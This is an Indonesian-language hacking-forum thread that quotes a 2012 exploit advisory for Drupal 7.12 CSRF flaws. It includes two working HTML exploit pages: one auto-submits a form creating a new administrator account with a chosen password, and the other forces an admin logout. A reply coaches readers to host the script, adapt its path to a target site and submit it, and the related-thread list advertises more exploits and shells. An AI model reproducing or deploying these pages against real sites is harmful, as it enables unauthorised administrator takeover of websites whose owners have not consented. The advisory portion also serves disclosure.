Threaded Mode | Linear Mode

jincorn · 03-03-2012, 09:28 PM

assalamualikum agan22....
barusan jalan2 di forum luar malah dapet kaya gini...

Quote:+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date : 02-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://drupal.org/download
# Vendor site : http://drupal.org
# Version : 7.12 (and lower)
# Tested on : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03...lease.html
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerabilities Description
2.1 Poor Session Checking (CSRF to change any Drupal settings)
2.2 Poor Session Checking (CSRF to Force administrator logout)
2.3 Poor Session Checking (POST and GET method)
2.4 Poor Session Checking (Http Referer)
3)Exploit
3.1 Exploit (Add Administrator)
3.2 Exploit (Force logout)

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Drupal "is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active
and diverse community of people around the world".

2)Vulnerability Description
Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface.

2.1 Poor Session Checking (CSRF to change any Drupal settings)
Drupal, to secure changes made by administrators or users through web management interface, uses two alphanumeric parameters
("form_buid_id" and "form_token") which are sent inside any http POST request.
The parameter "form_buid_id" is generated different for any operation an admin/user performs, but there is a security flaw which allows to
use any other Drupal generated "form_buid_id" parameter (like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to make changes to Drupal settings
through web management interface. So, even if Drupal creates a different "form_buid_id" for any operation you can use another "form_buid_id"
compatible with Drupal instead of that generated by Drupa for that specific operation.
In the other parameter, "form_token", there is another security flaw inside the logic with which this parameter is generated, because is used the
same parameter for for similar operations in the same session (for example for article's creation Drupal assigns the same "form_token", for admin/user
creation Drupal assigns the same "form_token" and so on). This flaw can be used by un attacker which knows the values of "form_buid_id" and "form_token"
parameters (for example an internal attacker performing a "Man in The Middle Attack" or an external ttacker that controls an internal client by an
client-side exploit, an external attacker that controls directly a Drupal admin by a client-side exploit and son on. There are many possibilities)
to create an "ad-hoc" crafted web page that allows to performs any Drupal changes (add administrator, delete administrator, add web pages, delete
web pages, and so on) when a Drupal administrator or User browses that crafted web page.

2.2 Poor Session Checking (CSRF to Force administrator logout)
There is another vulnerability - always related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows
an attacker to create a crafted web page an force logout of Drupal administrator/users at web management interface. This vulnerability - forcing
administrator logout - will aid an attacker to sniff authentication credentials when a "Man in The Middle Attack" is performed.

2.3 Poor Session Checking (POST and GET method)
Drupal does not check "GET" or "POST" http method allowing, even though normal logout is made via http GET request, to exploit the above vulnerability
using http POST method.

2.4 Poor Session Checking (Http Referer)
Drupal, furthermore, does not perform "http referer" checking, allowing to exploit all above described vulnerabilities.

3)Exploit

3.1 Exploit (Add Administrator)
<html>
<body onload="jdocument.forms[0].submit()">
<H2>CSRF Exploit change user to admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
<input type="hidden" name="name" value="new_admin"/>
<input type="hidden" name="mail" value="new_admin@new_admin.com"/>
<input type="hidden" name="pass[pass1]" value="new_password"/>
<input type="hidden" name="pass[pass2]" value="new_password"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="timezone" value="Europe/Prague"/>
<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>
</form>
</body>
</html>

3.2 Exploit (Force logout)
<html>
<body onload="jdocument.forms[0].submit()">
<H2>CSRF Exploit to logout Admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
</form>
</body>
</html>

+--------------------------------------------------------------------------------------------------------------------------------------------------+

itu maksudnya gimana ya...????
sabar

maaf nibizzz om..

EksMillionere · (This post was last modified: 03-03-2012 10:12 PM by EksMillionere.)

csrf mungkin bg,
kalo ane gak ngarti yg kya gini, coba cek digoogle aja bg tentang csrf

afika666 · 03-03-2012, 11:14 PM

gampang kok kk'...
Kan csrf tu,
tinggal tempel script exploitna ke localhost ato kemana kek, abis itu tinggal submit aja deh,
yg pasti harus di sesuain ama path dari situs target'a..

Nb kk': kalo pada method get, kita cuma manipulasi url nya doang.. ^_^

#maap yah, fika cuma bisa jelesinya segini, cos lagi ol pake hape..
Hiks, mati lampu...
suram

jincorn · 03-04-2012, 07:40 AM

makasih ya kk atas penjeasanya.....

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php)	XPByte	16	1,046	05-19-2013 05:40 PM Last Post: oe_c0x
	[Tutor] Facebook session Exploit Priv8	abuabu_hat10	20	402	05-19-2013 05:36 PM Last Post: oe_c0x
	MinaliC Webserver 2.0.0 HTTP Post Exploit	cr0security	8	140	04-23-2013 09:07 AM Last Post: darkmessage
	[Tutor] Exploit windows dengan add on dan dns spoof	RieqyNS13	17	338	02-10-2013 08:35 PM Last Post: cangcimen
	[Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload	Regel	11	674	02-02-2013 12:19 AM Last Post: copaker21
	Butuh Local Exploit Kernel Server	AnonymousOpsID	2	164	11-24-2012 08:37 PM Last Post: AnonymousOpsID
	#DiyWeb Admin Bypass dan Remote file/shell Upload exploit	AnonymousOpsID	4	337	11-06-2012 05:07 PM Last Post: rock_me
	Kumpulan exploit dan 3000++ tool hacking	dvildance	3	346	10-31-2012 10:23 PM Last Post: jibril
	[Ask] [metasploit] gagal exploit ke komputer target via LAN	w0rmil_alazka	10	189	10-29-2012 10:46 AM Last Post: p0pc0rn
	php root shell exploit buat mesin x86_64 (tanpa bind dan bc)	mywisdom	38	1,675	10-01-2012 10:06 PM Last Post: Danzel